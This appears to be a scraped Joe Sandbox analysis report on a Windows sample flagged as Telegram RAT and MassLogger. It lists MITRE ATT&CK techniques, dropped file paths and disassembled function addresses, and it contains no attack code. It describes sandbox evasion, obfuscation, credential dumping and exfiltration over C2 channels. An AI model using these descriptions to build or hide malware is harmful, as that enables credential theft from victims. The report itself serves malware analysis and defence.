Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6ZoBPR3isG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

C:\Users\user\AppData\Local\Iw\Forstrkkelses.Tun

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

C:\Users\user\AppData\Local\Iw\impulserne.Kla

C:\Users\user\AppData\Local\Iw\prepares.pli

C:\Users\user\AppData\Local\Temp\nst98FE.tmp

C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll

Static File Info

General

File Icon

Windows Analysis Report
6ZoBPR3isG.exe

Function 004034A5 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 410
stringfilecomCOMMON

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 73F91777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre